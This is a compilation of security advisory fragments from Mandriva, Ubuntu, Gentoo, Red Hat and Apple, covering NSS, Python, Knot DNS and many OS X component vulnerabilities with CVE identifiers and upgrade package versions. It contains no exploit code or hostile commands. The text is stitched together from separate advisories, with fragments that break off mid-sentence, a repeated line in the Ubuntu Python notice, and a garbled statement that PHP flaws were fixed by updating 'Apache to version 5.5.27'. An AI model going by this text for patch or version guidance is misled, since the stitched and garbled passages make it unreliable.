https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.16.3_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.1_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.2_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.3_release_notes
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/NSS_3.17.4_release_notes
https://www.mozilla.org/en-US/security/advisories/mfsa2014-55/
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
2aea53da7622f23ec03faa5605d9672c mbs2/x86_64/lemon-3.8.6-1.mbs2.x86_64.rpm
68cc94d4a95146583d8a6b2849759614 mbs2/x86_64/lib64nspr4-4.10.8-1.mbs2.x86_64.rpm
a6ffe2ebe6de847b6227c8c4c2cb4ba4 mbs2/x86_64/lib64nspr-devel-4.10.8-1.mbs2.x86_64.rpm
78ba63e6a21b897abac8e4b0e975470d mbs2/x86_64/lib64nss3-3.17.4-1.mbs2.x86_64.rpm
aacf8b1f144a7044e77abc5d0be72a7b mbs2/x86_64/lib64nss-devel-3.17.4-1.mbs2.x86_64.rpm
6afff220f7fa93dede0486b76155ae44 mbs2/x86_64/lib64nss-static-devel-3.17.4-1.mbs2.x86_64.rpm
63ffb7675dc414a52a4647f5ed302e3c mbs2/x86_64/lib64sqlite3_0-3.8.6-1.mbs2.x86_64.rpm
cfefad1ef4f83cceeeb34a4f2ffca442 mbs2/x86_64/lib64sqlite3-devel-3.8.6-1.mbs2.x86_64.rpm
e976251ee0ae5c2b2a2f6a163b693e85 mbs2/x86_64/lib64sqlite3-static-devel-3.8.6-1.mbs2.x86_64.rpm
42018611a17d2b6480b63f0a968a796d mbs2/x86_64/nss-3.17.4-1.mbs2.x86_64.rpm
b955454c30e482635944134eb02456e4 mbs2/x86_64/nss-doc-3.17.4-1.mbs2.noarch.rpm
3058267964146b7806c493ff536da63d mbs2/x86_64/rootcerts-20141117.00-1.mbs2.x86_64.rpm
18fc28f1ae18ddd5fe01acb77811d0e6 mbs2/x86_64/rootcerts-java-20141117.00-1.mbs2.x86_64.rpm
200f6a413d13d850ea084a9e42c4fc23 mbs2/x86_64/sqlite3-tcl-3.8.6-1.mbs2.x86_64.rpm
8c88a446098d21cf2675173e32a208e6 mbs2/x86_64/sqlite3-tools-3.8.6-1.mbs2.x86_64.rpm
2e494a940c3189617ff62bc15a2b14fb mbs2/SRPMS/nspr-4.10.8-1.mbs2.src.rpm
0a28d1c9c07909d488c7dabe92c47529 mbs2/SRPMS/nss-3.17.4-1.mbs2.src.rpm
10dcc357bb0bbdc22e7dd308074d037b mbs2/SRPMS/rootcerts-20141117.00-1.mbs2.src.rpm
df412cc892bb40e1d7345079a25c0bbb mbs2/SRPMS/sqlite3-3.8.6-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVAvuLmqjQ0CJFipgRArOfAKDn7F7m/ZnJATspmFD0k083yGXQJwCdHAzw
P1QqaGn3HFIH8gKR7XVcRAA=
=ZF+9
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-2360-1
September 24, 2014
firefox vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Fraudulent security certificates could allow sensitive information to
be exposed when accessing the Internet.
Software Description:
- firefox: Mozilla Open Source web browser
Details:
Antoine Delignat-Lavaud and others discovered that NSS incorrectly handled
parsing ASN.1 values.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
firefox 32.0.3+build1-0ubuntu0.14.04.1
Ubuntu 12.04 LTS:
firefox 32.0.3+build1-0ubuntu0.12.04.1
After a standard system update you need to restart Firefox to make
all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-2360-1
CVE-2014-1568
Package Information:
https://launchpad.net/ubuntu/+source/firefox/32.0.3+build1-0ubuntu0.14.04.1
https://launchpad.net/ubuntu/+source/firefox/32.0.3+build1-0ubuntu0.12.04.1
.
For the testing distribution (jessie) and unstable distribution (sid),
Iceweasel uses the system NSS library, handled in DSA 3033-1
| VAR-201803-0062 | CVE-2014-0486 | Knot DNS Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Knot DNS before 1.5.2 allows remote attackers to cause a denial of service (application crash) via a crafted DNS message. Knot DNS Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Knot DNS is a DNS server. Knot DNS is prone to an unspecified denial-of-service vulnerability.
Remote attackers can exploit this issue to cause denial-of-service conditions for legitimate users
| VAR-201410-1319 | CVE-2014-7185 | Python of bufferobject.c Integer overflow vulnerability |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function. Python is prone to an integer-overflow vulnerability because it fails to properly bounds check user-supplied input before copying it into an insufficiently sized buffer.
Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition.
Versions prior to Python 2.7.8 are vulnerable. The language is scalable, supports modules and packages, and supports multiple platforms. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Python 3.3 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1"
All Python 2.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1"
References
==========
[ 1 ] CVE-2013-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752
[ 2 ] CVE-2013-7338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338
[ 3 ] CVE-2014-1912
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912
[ 4 ] CVE-2014-2667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667
[ 5 ] CVE-2014-4616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616
[ 6 ] CVE-2014-7185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185
[ 7 ] CVE-2014-9365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. ============================================================================
Ubuntu Security Notice USN-2653-1
June 25, 2015
python2.7, python3.2, python3.4 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Python. A malicious ftp, http,
imap, nntp, pop or smtp server could use this issue to cause a denial of
service. This issue only affected Ubuntu
12.04 LTS and Ubuntu 14.04 LTS. This
issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected
Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
python2.7 2.7.8-10ubuntu1.1
python2.7-minimal 2.7.8-10ubuntu1.1
python3.4 3.4.2-1ubuntu0.1
python3.4-minimal 3.4.2-1ubuntu0.1
Ubuntu 14.04 LTS:
python2.7 2.7.6-8ubuntu0.2
python2.7-minimal 2.7.6-8ubuntu0.2
python3.4 3.4.0-2ubuntu1.1
python3.4-minimal 3.4.0-2ubuntu1.1
Ubuntu 12.04 LTS:
python2.7 2.7.3-0ubuntu3.8
python2.7-minimal 2.7.3-0ubuntu3.8
python3.2 3.2.3-0ubuntu3.7
python3.2-minimal 3.2.3-0ubuntu3.7
In general, a standard system update will make all the necessary changes. 7) - noarch, x86_64
3. The python27 collection provide a stable release of
Python 2.7 with a number of additional utilities and database connectors
for MySQL and PostgreSQL.
The python27-python packages have been upgraded to upstream version 2.7.8,
which provides numerous bug fixes over the previous version. (BZ#1167912)
The following security issues were fixed in the python27-python component:
It was discovered that the socket.recvfrom_into() function failed to check
the size of the supplied buffer. (CVE-2014-4616)
In addition, this update adds the following enhancement:
* The python27 Software Collection now includes the python-wheel and
python-pip modules. All running python27
instances must be restarted for this update to take effect. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update
2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available
and addresses the following:
apache
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These were addressed by updating Apache to version
2.4.16.
CVE-ID
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
apache_mod_php
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most
serious of which may lead to arbitrary code execution. These were addressed by updating Apache to version 5.5.27.
CVE-ID
CVE-2015-2783
CVE-2015-2787
CVE-2015-3307
CVE-2015-3329
CVE-2015-3330
CVE-2015-4021
CVE-2015-4022
CVE-2015-4024
CVE-2015-4025
CVE-2015-4026
CVE-2015-4147
CVE-2015-4148
Apple ID OD Plug-in
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able change the password of a
local user
Description: In some circumstances, a state management issue existed
in password authentication. The issue was addressed through improved
state management.
CVE-ID
CVE-2015-3799 : an anonymous researcher working with HP's Zero Day
Initiative
AppleGraphicsControl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in AppleGraphicsControl which could
have led to the disclosure of kernel memory layout. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in
IOBluetoothHCIController. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory management issue could have led to the
disclosure of kernel memory layout. This issue was addressed with
improved memory management.
CVE-ID
CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze
Networks
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious app may be able to access notifications from
other iCloud devices
Description: An issue existed where a malicious app could access a
Bluetooth-paired Mac or iOS device's Notification Center
notifications via the Apple Notification Center Service. The issue
affected devices using Handoff and logged into the same iCloud
account. This issue was resolved by revoking access to the Apple
Notification Center Service.
CVE-ID
CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security
Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng
Wang (Indiana University)
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with privileged network position may be able to
perform denial of service attack using malformed Bluetooth packets
Description: An input validation issue existed in parsing of
Bluetooth ACL packets. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-3787 : Trend Micro
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: Multiple buffer overflow issues existed in blued's
handling of XPC messages. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-3777 : mitp0sh of [PDX]
bootp
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have
broadcast MAC addresses of previously accessed networks via the DNAv4
protocol. This issue was addressed through disabling DNAv4 on
unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,
University of Oxford (on the EPSRC Being There project)
CloudKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access the iCloud
user record of a previously signed in user
Description: A state inconsistency existed in CloudKit when signing
out users. This issue was addressed through improved state handling.
CVE-ID
CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in CoreMedia Playback.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-5777 : Apple
CVE-2015-5778 : Apple
CoreText
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities in cURL and libcurl prior to
7.38.0, one of which may allow remote attackers to bypass the Same
Origin Policy.
Description: Multiple vulnerabilities existed in cURL and libcurl
prior to 7.38.0. These issues were addressed by updating cURL to
version 7.43.0.
CVE-ID
CVE-2014-3613
CVE-2014-3620
CVE-2014-3707
CVE-2014-8150
CVE-2014-8151
CVE-2015-3143
CVE-2015-3144
CVE-2015-3145
CVE-2015-3148
CVE-2015-3153
Data Detectors Engine
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a sequence of unicode characters can lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in processing of
Unicode characters. These issues were addressed through improved
memory handling.
CVE-ID
CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Applications that rely on system time may have unexpected
behavior
Description: An authorization issue existed when modifying the
system date and time preferences. This issue was addressed with
additional authorization checks.
CVE-ID
CVE-2015-3757 : Mark S C Smith
Dictionary Application
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with a privileged network position may be able
to intercept users' Dictionary app queries
Description: An issue existed in the Dictionary app, which did not
properly secure user communications. This issue was addressed by
moving Dictionary queries to HTTPS.
CVE-ID
CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security
Team
DiskImages
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-3804 : Apple
CVE-2015-5775 : Apple
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple issues in pdfroff
Description: Multiple issues existed in pdfroff, the most serious of
which may allow arbitrary filesystem modification. These issues were
addressed by removing pdfroff.
CVE-ID
CVE-2009-5044
CVE-2009-5078
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
TIFF images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5758 : Apple
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Visiting a maliciously crafted website may result in the
disclosure of process memory
Description: An uninitialized memory access issue existed in
ImageIO's handling of PNG and TIFF images. Visiting a malicious
website may result in sending data from process memory to the
website. This issue is addressed through improved memory
initialization and additional validation of PNG and TIFF images.
CVE-ID
CVE-2015-5781 : Michal Zalewski
CVE-2015-5782 : Michal Zalewski
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An issue existed in how Install.framework's 'runner'
binary dropped privileges. This issue was addressed through improved
privilege management.
CVE-ID
CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A race condition existed in
Install.framework's 'runner' binary that resulted in
privileges being incorrectly dropped. This issue was addressed
through improved object locking.
CVE-ID
CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Memory corruption issues existed in IOFireWireFamily.
These issues were addressed through additional type input validation.
CVE-ID
CVE-2015-3769 : Ilja van Sprundel
CVE-2015-3771 : Ilja van Sprundel
CVE-2015-3772 : Ilja van Sprundel
IOGraphics
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in IOGraphics. This
issue was addressed through additional type input validation.
CVE-ID
CVE-2015-3770 : Ilja van Sprundel
CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A buffer overflow issue existed in IOHIDFamily. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5774 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in the mach_port_space_info interface,
which could have led to the disclosure of kernel memory layout. This
was addressed by disabling the mach_port_space_info interface.
CVE-ID
CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,
@PanguTeam
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2015-3768 : Ilja van Sprundel
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A resource exhaustion issue existed in the fasttrap
driver. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A validation issue existed in the mounting of HFS
volumes. This was addressed by adding additional checks.
CVE-ID
CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute unsigned code
Description: An issue existed that allowed unsigned code to be
appended to signed code in a specially crafted executable file. This
issue was addressed through improved code signature validation.
CVE-ID
CVE-2015-3806 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A specially crafted executable file could allow unsigned,
malicious code to execute
Description: An issue existed in the way multi-architecture
executable files were evaluated that could have allowed unsigned code
to be executed. This issue was addressed through improved validation
of executable files.
CVE-ID
CVE-2015-3803 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute unsigned code
Description: A validation issue existed in the handling of Mach-O
files. This was addressed by adding additional checks.
CVE-ID
CVE-2015-3802 : TaiG Jailbreak Team
CVE-2015-3805 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted plist may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption existed in processing of malformed
plists. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein
(@jollyjinx) of Jinx Germany
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed. This was addressed
through improved environment sanitization.
CVE-ID
CVE-2015-3761 : Apple
Libc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted regular expression may lead
to an unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in the TRE library.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-3796 : Ian Beer of Google Project Zero
CVE-2015-3797 : Ian Beer of Google Project Zero
CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: Memory corruption issues existed in handling AF_INET6
sockets. These were addressed by improved memory handling.
CVE-ID
CVE-2015-5776 : Apple
libpthread
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling syscalls.
This issue was addressed through improved lock state checking.
CVE-ID
CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in libxml2 versions prior
to 2.9.2, the most serious of which may allow a remote attacker to
cause a denial of service
Description: Multiple vulnerabilities existed in libxml2 versions
prior to 2.9.2. These were addressed by updating libxml2 to version
2.9.2.
CVE-ID
CVE-2012-6685 : Felix Groebert of Google
CVE-2014-0191 : Felix Groebert of Google
libxml2
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory access issue existed in libxml2. This was
addressed by improved memory handling
CVE-ID
CVE-2014-3660 : Felix Groebert of Google
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory corruption issue existed in parsing of XML
files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3807 : Apple
libxpc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling of
malformed XPC messages. This issue was improved through improved
bounds checking.
CVE-ID
CVE-2015-3795 : Mathew Rowley
mail_cmds
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary shell commands
Description: A validation issue existed in the mailx parsing of
email addresses. This was addressed by improved sanitization.
CVE-ID
CVE-2014-7844
Notification Center OSX
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access all
notifications previously displayed to users
Description: An issue existed in Notification Center, which did not
properly delete user notifications. This issue was addressed by
correctly deleting notifications dismissed by users.
CVE-ID
CVE-2015-3764 : Jonathan Zdziarski
ntfs
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in NTFS. This issue
was addressed through improved memory handling.
CVE-ID
CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze
Networks
OpenSSH
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Remote attackers may be able to circumvent a time delay for
failed login attempts and conduct brute-force attacks
Description: An issue existed when processing keyboard-interactive
devices. This issue was addressed through improved authentication
request validation.
CVE-ID
CVE-2015-5600
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in OpenSSL versions prior
to 0.9.8zg, the most serious of which may allow a remote attacker to
cause a denial of service.
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
perl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted regular expression may lead to
disclosure of unexpected application termination or arbitrary code
execution
Description: An integer underflow issue existed in the way Perl
parsed regular expressions. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2013-7422
PostgreSQL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: An attacker may be able to cause unexpected application
termination or gain access to data without proper authentication
Description: Multiple issues existed in PostgreSQL 9.2.4. These
issues were addressed by updating PostgreSQL to 9.2.13.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
python
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Python 2.7.6, the most
serious of which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in Python versions
prior to 2.7.6.
CVE-ID
CVE-2013-7040
CVE-2013-7338
CVE-2014-1912
CVE-2014-7185
CVE-2014-9365
QL Office
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted Office document may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of Office
documents. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5773 : Apple
QL Office
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML file may lead to
disclosure of user information
Description: An external entity reference issue existed in XML file
parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted QuickTime file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of
QuickTime files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5771 : Apple
Quick Look
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Searching for a previously viewed website may launch the web
browser and render that website
Description: An issue existed where QuickLook had the capability to
execute JavaScript. The issue was addressed by disallowing execution
of JavaScript.
CVE-ID
CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3772
CVE-2015-3779
CVE-2015-5753 : Apple
CVE-2015-5779 : Apple
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3765 : Joe Burnett of Audio Poison
CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-5751 : WalkerFuz
SceneKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted Collada file may lead to
arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5772 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
